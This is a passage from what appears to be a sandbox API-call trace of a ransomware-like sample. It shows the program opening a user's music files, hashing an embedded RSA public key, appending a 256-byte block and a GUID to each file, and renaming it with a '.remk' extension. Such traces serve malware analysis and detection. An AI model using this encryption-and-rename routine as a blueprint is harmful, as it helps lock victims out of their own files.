HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\91vVO4gMJf8R.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\91vvo4gmjf8r.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.353] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=18523) returned 1 [0234.353] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.355] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x4835, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.355] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.357] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.357] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x485b, lpOverlapped=0x0) returned 1 [0234.357] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.357] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.358] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.358] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.358] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.358] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.358] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.359] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.359] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.359] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.359] GetLastError () returned 0x0 [0234.359] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.359] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.359] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.359] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.359] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.359] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.359] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.359] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.359] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x485b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.360] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.360] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.360] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.360] CloseHandle (hObject=0x640) returned 1 [0234.361] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.361] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x37bc408 [0234.361] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\91vVO4gMJf8R.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\91vvo4gmjf8r.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\91vVO4gMJf8R.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\91vvo4gmjf8r.m4a.remk")) returned 1 [0234.363] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb53e060, ftCreationTime.dwHighDateTime=0x1d5db84, ftLastAccessTime.dwLowDateTime=0x5bad4df0, ftLastAccessTime.dwHighDateTime=0x1d5ddae, ftLastWriteTime.dwLowDateTime=0x5bad4df0, ftLastWriteTime.dwHighDateTime=0x1d5ddae, nFileSizeHigh=0x0, nFileSizeLow=0x11efe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BQcrUevf.wav", cAlternateFileName="")) returned 1 [0234.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.363] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\BQcrUevf.wav") returned=".wav" [0234.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\BQcrUevf.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\bqcruevf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.363] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=73470) returned 1 [0234.364] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.366] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11ed8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.366] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.367] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x11efe, lpOverlapped=0x0) returned 1 [0234.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.368] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.368] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.370] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.370] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.370] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.370] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.370] GetLastError () returned 0x0 [0234.370] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.370] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.370] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.370] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.370] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.371] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.371] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11efe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.371] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.372] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.372] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.372] CloseHandle (hObject=0x640) returned 1 [0234.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.378] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x37bc408 [0234.378] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\BQcrUevf.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\bqcruevf.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\BQcrUevf.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\bqcruevf.wav.remk")) returned 1 [0234.380] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b565f80, ftCreationTime.dwHighDateTime=0x1d5e522, ftLastAccessTime.dwLowDateTime=0x57d37a90, ftLastAccessTime.dwHighDateTime=0x1d5e67f, ftLastWriteTime.dwLowDateTime=0x57d37a90, ftLastWriteTime.dwHighDateTime=0x1d5e67f, nFileSizeHigh=0x0, nFileSizeLow=0x6375, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C_5lQ-Upo7x8z.wav", cAlternateFileName="C_5LQ-~1.WAV")) returned 1 [0234.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.380] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.380] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\C_5lQ-Upo7x8z.wav") returned=".wav" [0234.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\C_5lQ-Upo7x8z.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\c_5lq-upo7x8z.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.381] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=25461) returned 1 [0234.381] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.384] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x634f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.384] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.386] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x6375, lpOverlapped=0x0) returned 1 [0234.387] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.387] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.387] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.387] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.388] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.388] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.388] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.388] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.388] GetLastError () returned 0x0 [0234.388] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.388] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.388] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.388] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.388] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.389] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.389] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x6375, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.389] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.389] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.389] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.390] CloseHandle (hObject=0x640) returned 1 [0234.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.399] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x37bc408 [0234.399] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\C_5lQ-Upo7x8z.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\c_5lq-upo7x8z.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\C_5lQ-Upo7x8z.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\c_5lq-upo7x8z.wav.remk")) returned 1 [0234.401] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b0ed970, ftCreationTime.dwHighDateTime=0x1d5dcc2, ftLastAccessTime.dwLowDateTime=0xcc0f230, ftLastAccessTime.dwHighDateTime=0x1d5da09, ftLastWriteTime.dwLowDateTime=0xcc0f230, ftLastWriteTime.dwHighDateTime=0x1d5da09, nFileSizeHigh=0x0, nFileSizeLow=0x11c76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iGbC-X.wav", cAlternateFileName="")) returned 1 [0234.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.401] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\iGbC-X.wav") returned=".wav" [0234.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\iGbC-X.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\igbc-x.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.403] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=72822) returned 1 [0234.403] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.405] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11c50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.405] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.407] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x11c76, lpOverlapped=0x0) returned 1 [0234.408] lstrlenA (lpString="-----BEGIN PUBLIC 